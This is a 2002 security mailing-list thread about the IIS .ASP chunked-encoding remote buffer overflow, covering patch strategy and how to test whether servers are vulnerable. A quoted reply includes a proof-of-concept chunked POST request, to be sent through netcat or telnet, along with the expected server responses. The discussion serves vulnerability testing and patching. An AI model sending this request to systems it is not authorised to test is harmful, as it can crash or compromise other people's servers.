Testing Of Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow

["Brett Moore" <brett () softwarecreations co nz>]

Hi All,
        Probably a more reliable and safe way of testing if this patch is installed
or not, would be to test 1 of the css holes?

        The asp bug is very easy to exploit. I had never written a bof exploit
before and now have one. So there must be plenty in the wild. It is an
important patch.

        Which brings me to my main point. Microsoft in all its wisdom has decided
that 1 big patch is better than 10 little. And as reports are coming in of
servers crashing and the patch breaking things, ppl will decide not to apply
the patch yet. This means that even if (for example) the 'breaking part' of
the patch applys to the code that fixes the css holes, a user can not patch
themselves against the asp overflow.

        So what is the general opinion, 1 big patch or 10 little patches?

Brett

> -----Original Message-----
> From: MadHat [mailto:madhat () unspecific com]
> Sent: Saturday, 13 April 2002 02:12
> To: Erik Parker
> Cc: 'Marc Maiffret'; Vuln-Dev
> Subject: RE: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow
>
>
> I have not been able to reproduce these results.  I have managed to lock
> up IIS (IIS 5.0 with all patches pre Apr 1, 2002), but no popup messages
> appear and no entries in the Application Log.  I have also been able get
> the 100 Continue message (IIS 4.0 all patches pre Apr 1, 2002), but
> still no popup or messages.
>
> Is there a reliable way to scan for these vulnerabilities remotely?
>
> On Thu, 2002-04-11 at 11:25, Erik Parker wrote:
> > JM> Anyone have a proof of concept for this exploit?
> >
> > eEye included some. Use this with "netcat" or "telnet"
> >
> > replace [enter] with an actual pressing of your enter key (look at the
> > bottom, you can cut n paste)
> >
> > It should return something like this, if it worked (and generate a popup
> > error to you that says "Unknown has generated errors")
> >
> > HTTP/1.1 100 Continue
> > Server: Microsoft-IIS/5.0
> > Date: Wed, 27 Mar 2002 23:37:32 GMT
> >
> > If it fails, it'll say something like:
> >
> > HTTP/1.1 500 Server Error
> > Server: Microsoft-IIS/5.0
> >
> >
> > The application log will say:
> >
> > Active Server Pages service has started
> > Access performance data was denied to IWAM_netbiosname as
> attempted from c:\WINNT\SYSTEM32\Drwtsn32.exe
> > **************Begin Session****************
> > POST /iisstart.asp HTTP/1.1
> > Accept: */*
> > Host: eeye.com
> > Content-Type: application/x-www-form-urlencoded
> > Transfer-Encoding: chunked
> >
> > 10
> > PADPADPADPADPADP
> > 4
> > DATA
> > 4
> > DEST
> > 0
> > [enter]
> > [enter]
> > **************End Session******************
> --
> MadHat at Unspecific.com
> gpg --keyserver wwwkeys.us.pgp.net --recv-keys 9DDC3E98
> Key fingerprint = E786 7B30 7534 DCC2 94D5  91DE E922 0B21 9DDC 3E98